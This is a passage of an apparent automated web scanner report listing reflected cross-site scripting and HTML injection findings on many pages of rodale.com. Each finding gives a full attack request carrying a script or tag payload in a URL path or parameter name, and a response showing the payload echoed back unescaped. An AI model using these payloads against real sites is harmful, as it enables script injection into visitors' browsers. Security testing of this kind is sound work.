HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:08 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:10 GMT
Date: Thu, 10 Mar 2011 17:06:10 GMT
Content-Length: 22491
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page green-kitchen-safety-tips72d20"><a>290e132ce9d node node-958">
...[SNIP]...

2.165. http://www.rodale.com/green-kitchen-safety-tips [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /green-kitchen-safety-tips

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d12a"><script>alert(1)</script>9adf26f5469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /green-kitchen-safety-tips?3d12a"><script>alert(1)</script>9adf26f5469=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:06 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:08 GMT
Date: Thu, 10 Mar 2011 17:06:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2nbqvorb965q6draus57kofrs2; path=/; domain=.rodale.com
Content-Length: 44136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/green-kitchen-safety-tips?3d12a"><script>alert(1)</script>9adf26f5469=1&title=How+to+Keep+Your+Kitchen+Green%2C+Clean%2C+and+Safe">
...[SNIP]...

2.166. http://www.rodale.com/green-school-supplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /green-school-supplies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36946"><a>1385a38e9b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /green-school-supplies36946"><a>1385a38e9b4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:29 GMT
Date: Thu, 10 Mar 2011 17:05:29 GMT
Content-Length: 22479
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page green-school-supplies36946"><a>1385a38e9b4 node node-958">
...[SNIP]...

2.167. http://www.rodale.com/green-school-supplies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /green-school-supplies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122cc"><script>alert(1)</script>3d802d1745c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /green-school-supplies?122cc"><script>alert(1)</script>3d802d1745c=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:26 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:27 GMT
Date: Thu, 10 Mar 2011 17:05:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2v292tmg9395t6lck999gj8qm6; path=/; domain=.rodale.com
Content-Length: 42547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/green-school-supplies?122cc"><script>alert(1)</script>3d802d1745c=1&title=Your+A%2B+Guide+to+Green+School+Supplies">
...[SNIP]...

2.168. http://www.rodale.com/happiest-place-live-united-states [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /happiest-place-live-united-states

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26131"><a>705617324d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /happiest-place-live-united-states26131"><a>705617324d0 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:43 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:44 GMT
Date: Thu, 10 Mar 2011 17:05:44 GMT
Content-Length: 22515
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page happiest-place-live-united-states26131"><a>705617324d0 node node-958">
...[SNIP]...

2.169. http://www.rodale.com/happiest-place-live-united-states [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /happiest-place-live-united-states

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e255"><script>alert(1)</script>1d4ffd27f15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /happiest-place-live-united-states?9e255"><script>alert(1)</script>1d4ffd27f15=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:40 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:42 GMT
Date: Thu, 10 Mar 2011 17:05:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2c4rqsbjg1e0dfvp45qa98g741; path=/; domain=.rodale.com
Content-Length: 38814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/happiest-place-live-united-states?9e255"><script>alert(1)</script>1d4ffd27f15=1&title=Be+As+Happy+as+Hawaii%2C+Wherever+You+Live">
...[SNIP]...

2.170. http://www.rodale.com/health [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /health

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c540a"><a>ae53cd85c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /healthc540a"><a>ae53cd85c37 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:20 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:22 GMT
Date: Thu, 10 Mar 2011 17:07:22 GMT
Content-Length: 22434
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page healthc540a"><a>ae53cd85c37 node node-958">
...[SNIP]...

2.171. http://www.rodale.com/health [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /health

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab44a"><a>bec9423f369 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health?ab44a"><a>bec9423f369=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:16 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:21 GMT
Date: Thu, 10 Mar 2011 17:05:21 GMT
Content-Length: 26949
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/health?ab44a"><a>bec9423f369=1" title="Register" class="moreLink">
...[SNIP]...

2.172. http://www.rodale.com/heart-attack-triggers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /heart-attack-triggers

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb38"><a>45e9873ee32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /heart-attack-triggerscdb38"><a>45e9873ee32 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:36:06 GMT
Date: Thu, 10 Mar 2011 17:06:07 GMT
Content-Length: 22479
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page heart-attack-triggerscdb38"><a>45e9873ee32 node node-958">
...[SNIP]...

2.173. http://www.rodale.com/heart-attack-triggers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /heart-attack-triggers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb25"><script>alert(1)</script>564e60a91c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /heart-attack-triggers?dbb25"><script>alert(1)</script>564e60a91c5=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:02 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:04 GMT
Date: Thu, 10 Mar 2011 17:06:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2vjhlkk1529r9plm9lb9mg65r3; path=/; domain=.rodale.com
Content-Length: 39517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/heart-attack-triggers?dbb25"><script>alert(1)</script>564e60a91c5=1&title=6+Surprising+Heart+Attack+Triggers%E2%80%94And+How+to+Avoid+Them">
...[SNIP]...

2.174. http://www.rodale.com/how-prevent-hangover [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /how-prevent-hangover

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ab9"><a>0521f4e25fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /how-prevent-hangoverc2ab9"><a>0521f4e25fc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:52 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:53 GMT
Date: Thu, 10 Mar 2011 17:05:53 GMT
Content-Length: 22476
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page how-prevent-hangoverc2ab9"><a>0521f4e25fc node node-958">
...[SNIP]...

2.175. http://www.rodale.com/how-prevent-hangover [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /how-prevent-hangover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8ca8"><script>alert(1)</script>0882a534b52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /how-prevent-hangover?d8ca8"><script>alert(1)</script>0882a534b52=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:50 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:51 GMT
Date: Thu, 10 Mar 2011 17:05:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=fj874quhv9dnimnruns1adqp45; path=/; domain=.rodale.com
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/how-prevent-hangover?d8ca8"><script>alert(1)</script>0882a534b52=1&title=Eat+Asparagus+to+Prevent+a+Hangover">
...[SNIP]...

2.176. http://www.rodale.com/lean-belly-prescription-0 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /lean-belly-prescription-0

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24eff"><a>b3586aad4d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /lean-belly-prescription-024eff"><a>b3586aad4d0 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:13 GMT
Date: Thu, 10 Mar 2011 17:06:13 GMT
Content-Length: 22491
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page lean-belly-prescription-024eff"><a>b3586aad4d0 node node-958">
...[SNIP]...

2.177. http://www.rodale.com/lean-belly-prescription-0 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /lean-belly-prescription-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2edf2"><a>6a2ca148eca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /lean-belly-prescription-0?2edf2"><a>6a2ca148eca=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 403 Forbidden
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:32 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:33 GMT
Date: Thu, 10 Mar 2011 17:05:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=o09niatdh18rp05j6e72i1cop6; path=/; domain=.rodale.com
Content-Length: 24254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/lean-belly-prescription-0?2edf2"><a>6a2ca148eca=1" title="Register" class="moreLink">
...[SNIP]...

2.178. http://www.rodale.com/living [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /living

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a96ab"><a>6b2cdfc6782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /livinga96ab"><a>6b2cdfc6782 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:42 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:44 GMT
Date: Thu, 10 Mar 2011 17:06:44 GMT
Content-Length: 22434
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page livinga96ab"><a>6b2cdfc6782 node node-958">
...[SNIP]...

2.179. http://www.rodale.com/living [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /living

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d84c"><a>59b0f950f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /living?6d84c"><a>59b0f950f6b=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:20 GMT
Date: Thu, 10 Mar 2011 17:05:20 GMT
Content-Length: 27151
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/living?6d84c"><a>59b0f950f6b=1" title="Register" class="moreLink">
...[SNIP]...

2.180. http://www.rodale.com/natural-sleep-remedies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /natural-sleep-remedies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db32a"><a>a3f39864366 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /natural-sleep-remediesdb32a"><a>a3f39864366 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:37 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:38 GMT
Date: Thu, 10 Mar 2011 17:05:38 GMT
Content-Length: 22482
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page natural-sleep-remediesdb32a"><a>a3f39864366 node node-958">
...[SNIP]...

2.181. http://www.rodale.com/natural-sleep-remedies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /natural-sleep-remedies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7af78"><script>alert(1)</script>0ece62a6df9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /natural-sleep-remedies?7af78"><script>alert(1)</script>0ece62a6df9=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
